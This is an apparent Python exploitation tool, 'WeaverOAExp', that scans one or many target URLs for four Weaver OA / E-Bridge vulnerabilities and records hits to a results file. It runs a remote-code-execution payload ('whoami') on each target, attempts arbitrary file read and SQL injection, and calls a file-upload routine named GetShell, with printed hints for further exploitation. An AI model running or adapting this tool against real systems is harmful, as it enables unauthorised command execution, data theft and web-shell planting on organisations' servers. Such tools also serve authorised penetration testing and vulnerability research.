# -*- coding: utf-8 -*-
import os
import argparse
import time
from pyfiglet import Figlet
from poc import E_Bridge_Arbitrary_File_Read, E_Cology_WorkflowServiceXml_RCE, E_Cology_V8_Sql,Weaver_Common_Ctrl_Upload
# ANSI escape sequences used to colour console output; every coloured
# message is built as COLOUR + text + ENDC, with ENDC resetting the style.
BLUE = '\033[0;36m'
RED = '\x1b[1;91m'
YELLOW = '\033[1;33m'
VIOLET = '\033[1;94m'
GREEN = '\033[1;32m'
# BOLD is defined but not referenced anywhere in this file.
BOLD = '\033[1m'
ENDC = '\033[0m'
def now_time():
    """Return the current local clock time as a "[HH:MM:SS] " prefix in BLUE.

    Used as the leading element of every console line printed by this script.
    """
    stamp = time.strftime("[%H:%M:%S] ", time.localtime())
    return "{}{}{}".format(BLUE, stamp, ENDC)
def info():
    """Return the coloured "[INFO] " tag placed before informational messages."""
    tag = "[INFO] "
    return "".join((VIOLET, tag, ENDC))
def error():
    """Return the coloured "[ERROR] " tag placed before error messages."""
    tag = "[ERROR] "
    return "".join((RED, tag, ENDC))
def warning():
    """Return the coloured "[WARNING] " tag placed before negative check results."""
    tag = "[WARNING] "
    return "".join((YELLOW, tag, ENDC))
def success():
    """Return the coloured "[SUCCESS] " tag placed before positive check results."""
    tag = "[SUCCESS] "
    return "".join((GREEN, tag, ENDC))
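def result(name, url):
    """Append one "name: url" line to result.txt in the current working directory.

    Args:
        name: label of the finding, as passed by check().
        url: normalised target URL the finding applies to.

    The file is opened with an explicit UTF-8 encoding so the non-ASCII labels
    are written identically on every platform (the original relied on the
    locale default), and the ``with`` block closes it even if the write fails.
    """
    with open('result.txt', 'a', encoding='utf-8') as out:
        out.write('{}: {}\n'.format(name, url))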
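def check(url):
    """Run each bundled detection against *url* and record positive findings.

    The target is normalised first: surrounding whitespace is dropped, a
    trailing '/' is appended when missing and 'http://' is prepended when the
    value does not start with 'http'. An empty target is reported and skipped
    instead of raising IndexError on ``url[-1]``. Every positive finding is
    printed and appended to result.txt through result(); the first two checks
    print a warning on a negative result, the last two print nothing.

    Args:
        url: target base URL or host name.
    """
    url = url.strip()
    if not url:
        print(now_time() + warning() + '目标为空, 已跳过')
        return
    if not url.endswith('/'):
        url += '/'
    if not url.startswith('http'):
        url = 'http://' + url
    print(now_time() + info() + 'Target: ' + url)

    # Weaver E-Bridge arbitrary file read. The second value returned by
    # check() is not used here.
    print(now_time() + info() + '正在检测泛微云桥任意文件读取漏洞')
    bridge_id, _system = E_Bridge_Arbitrary_File_Read.check(url)
    if bridge_id is None:
        print(now_time() + warning() + '不存在泛微云桥任意文件读取漏洞')
    else:
        E_Bridge_Arbitrary_File_Read.POC_2(url, bridge_id)
        print(now_time() + success() + 'python3 poc/E_Bridge_Arbitrary_File_Read.py {} 进行进一步利用'.format(url))
        result('泛微云桥任意文件读取', url)

    # Weaver WorkflowServiceXml RCE. exploit() is called once and its output
    # reused; the original called it twice, so the command ran on the target
    # a second time just to print the result.
    print(now_time() + info() + '正在检测泛微 WorkflowServiceXml RCE 漏洞')
    whoami_output = E_Cology_WorkflowServiceXml_RCE.exploit(url, 'whoami')
    if whoami_output is None:
        print(now_time() + warning() + '不存在泛微 WorkflowServiceXml RCE 漏洞')
    else:
        print(now_time() + info() + 'whoami: ' + whoami_output)
        print(now_time() + success() + 'python3 poc/E_Cology_WorkflowServiceXml_RCE.py {} cmd 进行进一步利用'.format(url))
        result('泛微 WorkflowServiceXml RCE', url)

    # Weaver OA V8 front-end SQL injection; poc() signals a positive with 'ok'.
    print(now_time() + info() + '正在检测泛微 OA V8 前台SQL注入漏洞')
    if E_Cology_V8_Sql.poc(url) == 'ok':
        result('泛微OA V8前台Sql注入', url)

    # Weaver OA weaver.common.Ctrl arbitrary file upload; GetShell() signals
    # a positive with 'ok'.
    print(now_time() + info() + '正在检测泛微OA weaver.common.Ctrl 任意文件上传漏洞')
    if Weaver_Common_Ctrl_Upload.GetShell(url) == 'ok':
        result('泛微OA weaver.common.Ctrl 任意文件上传', url)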
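if __name__ == '__main__':
    # Banner, then argument parsing. Exactly one of -u / -f is expected;
    # with neither, the Usage text is printed.
    print(VIOLET + Figlet(font='slant').renderText('WeaverOAExp') + ENDC)
    print(' Author: zjun HomePage: www.zjun.info\n')
    parser = argparse.ArgumentParser(description='泛微OA POC 合集')
    parser.add_argument('-u', '--url', dest='url', required=False, help='target url')
    parser.add_argument('-f', '--file', dest='file', required=False, help='url file')
    Usage = "Usage:\npython3 {0} -u url\npython3 {0} -f url.txt".format(
        os.path.basename(__file__))
    args = parser.parse_args()

    # result() appends to 'result.txt' relative to the working directory, so
    # the completion message reports that path; the original printed the
    # script's directory instead, which is wrong when the tool is launched
    # from elsewhere.
    result_path = os.path.abspath('result.txt')
    scanned = False
    if args.file:
        # Read the whole list first so that only the file I/O is covered by
        # the except clause and errors raised inside check() are not masked.
        try:
            with open(args.file, 'r', encoding='utf-8') as f:
                targets = [line.strip() for line in f]
        except OSError as exc:
            print(now_time() + error() + '无法读取 url 文件: {}'.format(exc))
        else:
            # Blank lines are skipped rather than crashing on url[-1];
            # check() performs the trailing-slash / scheme normalisation.
            for url in targets:
                if url:
                    check(url)
            scanned = True
    elif args.url:
        check(args.url)
        scanned = True
    else:
        print(Usage)
    if scanned:
        print(now_time() + info() + "扫描已完成, 结果保存至 '{}'".format(result_path))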